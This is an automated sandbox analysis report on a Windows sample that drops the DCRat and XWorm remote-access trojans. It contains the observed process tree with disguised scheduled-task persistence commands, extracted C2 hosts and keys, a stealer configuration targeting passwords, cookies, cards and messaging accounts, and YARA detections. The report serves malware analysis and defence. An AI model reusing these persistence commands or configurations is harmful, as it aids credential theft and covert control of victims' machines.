Edit tour

Windows Analysis Report
ywXeiXEvP2.exe

Overview

General Information

Sample name:	ywXeiXEvP2.exe renamed because original name is a hash value
Original sample name:	a8a4603bc85e306e0fdd17655e4820e4.exe
Analysis ID:	1455415
MD5:	a8a4603bc85e306e0fdd17655e4820e4
SHA1:	5aa5d092a699c319c4d000f61eb526445b11662d
SHA256:	4b7b7e697954f5882dd6d3e8ee6197bab6c445dbd3a5af1118caa0e1ad908a9a
Tags:	DCRatexe
Infos:

Detection

DCRat, XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Schedule system process

Snort IDS alert for network traffic

Yara detected DCRat

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Creates processes via WMI

Disable UAC(promptonsecuredesktop)

Disables UAC (registry)

Machine Learning detection for dropped file

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: System File Execution Location Anomaly

Sigma detected: WScript or CScript Dropper

Uses schtasks.exe or at.exe to add and modify task schedules

Windows Scripting host queries suspicious COM object (likely to drop second stage)

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to communicate with device drivers

Contains functionality to launch a program with higher privileges

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

File is packed with WinRar

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains executable resources (Code or Archives)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Startup Folder File Write

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

ywXeiXEvP2.exe (PID: 6852 cmdline: "C:\Users\user\Desktop\ywXeiXEvP2.exe" MD5: A8A4603BC85E306E0FDD17655E4820E4)

Result.exe (PID: 4900 cmdline: "C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe" MD5: 57D593692C8428B66ED146E1FAC689B7)

DCRatBuild.exe (PID: 7140 cmdline: "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" MD5: 95D7FC6FAA389C5751DE5C2F88D9580B)

wscript.exe (PID: 7248 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\UGsUclNNu9UBh.vbe" MD5: FF00E0480075B095948000BDC66E81F0)

cmd.exe (PID: 7436 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\hUqNkgIMv7nY24UYezK0etl.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 7444 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

ServerWeb.exe (PID: 7488 cmdline: "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\ServerWeb.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)

schtasks.exe (PID: 7960 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7976 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7992 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8016 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8032 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8048 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\microsoft\Temp\EUC7A5.tmp\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8064 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8080 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8096 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 8 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8120 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8136 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8152 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Multimedia Platform\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8168 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 7 /tr "'C:\Users\user\SendTo\sihost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 8184 cmdline: schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2756 cmdline: schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Users\user\SendTo\sihost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5768 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6824 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7228 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\jdownloader\config\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7172 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 6 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7244 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 6804 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Recovery\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5888 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 7 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7096 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7288 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 14 /tr "'C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2056 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwHF" /sc MINUTE /mo 10 /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 5780 cmdline: schtasks.exe /create /tn "FMxFFfLOKpqCLtTFEmbkPKJrDwH" /sc ONLOGON /tr "'C:\Windows\IdentityCRL\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)

wscript.exe (PID: 7268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Hypercontainercomponentnetcommon\file.vbs" MD5: FF00E0480075B095948000BDC66E81F0)

XClient.exe (PID: 7204 cmdline: "C:\Users\user\AppData\Local\Temp\XClient.exe" MD5: 1BE2B217087429A8397F448C9C7B8F8D)

conhost.exe (PID: 7280 cmdline: "C:\Program Files (x86)\jdownloader\config\conhost.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)

conhost.exe (PID: 2008 cmdline: "C:\Program Files (x86)\jdownloader\config\conhost.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)

FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe (PID: 7368 cmdline: "C:\Users\All Users\Templates\FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe" MD5: 7EC6BC11E4B2E409845E3160EC47F5D7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["127.0.0.1", "letter-takes.gl.at.ply.gg"], "Port": "50230", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: DCRat

{"SCRT": "{\"9\":\">\",\"A\":\"_\",\"a\":\"#\",\"4\":\"&\",\"j\":\"`\",\"i\":\")\",\"0\":\"(\",\"o\":\"~\",\"D\":\"!\",\"k\":\"$\",\"y\":\"|\",\"h\":\"@\",\"Q\":\"-\",\"H\":\"%\",\"S\":\" \",\"d\":\"<\",\"M\":\"*\",\"3\":\",\",\"J\":\";\",\"L\":\".\",\"m\":\"^\"}", "PCRT": "{\"O\":\"^\",\"U\":\"*\",\"v\":\"(\",\"V\":\")\",\"5\":\"!\",\"M\":\",\",\"Q\":\"$\",\"h\":\"-\",\"0\":\"_\",\"T\":\"~\",\"W\":\"@\",\"j\":\".\",\"1\":\"#\",\"L\":\"%\",\"K\":\"|\",\"t\":\";\",\"y\":\">\",\"a\":\"<\",\"o\":\" \",\"B\":\"&\",\"u\":\"`\"}", "TAG": "", "MUTEX": "DCR_MUTEX-s86YqWdFI22lJKKIYeYT", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 2, "ASCFG": {"savebrowsersdatatosinglefile": true, "ignorepartiallyemptydata": true, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": true, "ASO": false, "AD": false, "H1": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "H2": "http://a0991799.xsph.ru/@=AjM2MDZ4kjN", "T": "0"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
Result.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Result.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3c9a4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3d224b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3c9ae8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3d22e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3c9bfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3d23fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3c98bd:$cnc4: POST / HTTP/1.1 0x3d20bd:$cnc4: POST / HTTP/1.1

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7045:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Roaming\XClient.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Roaming\XClient.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x71d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7270:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7385:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x7045:$cnc4: POST / HTTP/1.1
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\Temp\RarSFX0\Result.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3c9a4b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3d224b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3c9ae8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3d22e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3c9bfd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3d23fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3c98bd:$cnc4: POST / HTTP/1.1 0x3d20bd:$cnc4: POST / HTTP/1.1
Click to see the 1 entries

Memory Dumps

Source	Rule	Description	Author	Strings
00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000003.1702782236.0000000000B09000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x63eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xec03:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6488:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xeca0:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x659d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xedb5:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x625d:$cnc4: POST / HTTP/1.1 0xea75:$cnc4: POST / HTTP/1.1
00000029.00000002.1997852879.00000000028C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000003.00000000.1702689242.0000000000482000.00000002.00000001.01000000.0000000B.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x6fd3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x7070:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x7185:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6e45:$cnc4: POST / HTTP/1.1
00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000002.1703441913.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x13eb:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x1488:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x159d:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x125d:$cnc4: POST / HTTP/1.1
00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.1719076090.00007FF7C01D6000.00000004.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x61e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0xd9e3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x6280:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0xda80:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x6395:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xdb95:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x6055:$cnc4: POST / HTTP/1.1 0xd855:$cnc4: POST / HTTP/1.1
00000008.00000002.1889481824.0000000002F1A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.1889481824.0000000002901000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000025.00000002.1976381139.0000000002EC1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000026.00000002.1958522017.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000001.00000000.1684955911.0000000000408000.00000002.00000001.01000000.00000009.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x3c884b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3d104b:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x3c88e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3d10e8:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x3c89fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3d11fd:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x3c86bd:$cnc4: POST / HTTP/1.1 0x3d0ebd:$cnc4: POST / HTTP/1.1
00000029.00000002.1997852879.00000000028DC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
00000008.00000002.1902459797.000000001290D000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: ywXeiXEvP2.exe PID: 6852	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: Result.exe PID: 4900	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: XClient.exe PID: 7204	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: ServerWeb.exe PID: 7488	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: conhost.exe PID: 7280	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: conhost.exe PID: 2008	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Process Memory Space: FMxFFfLOKpqCLtTFEmbkPKJrDwH.exe PID: 7368	JoeSecurity_DCRat_1	Yara detected DCRat	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.3.Result.exe.b10a30.1.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.3.Result.exe.b10a30.1.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x53d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5470:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5585:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5245:$cnc4: POST / HTTP/1.1
1.0.Result.exe.7c9678.2.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
1.0.Result.exe.7c9678.2.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x53d3:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x5470:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x5585:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0x5245:$cnc4: POST / HTTP/1.1
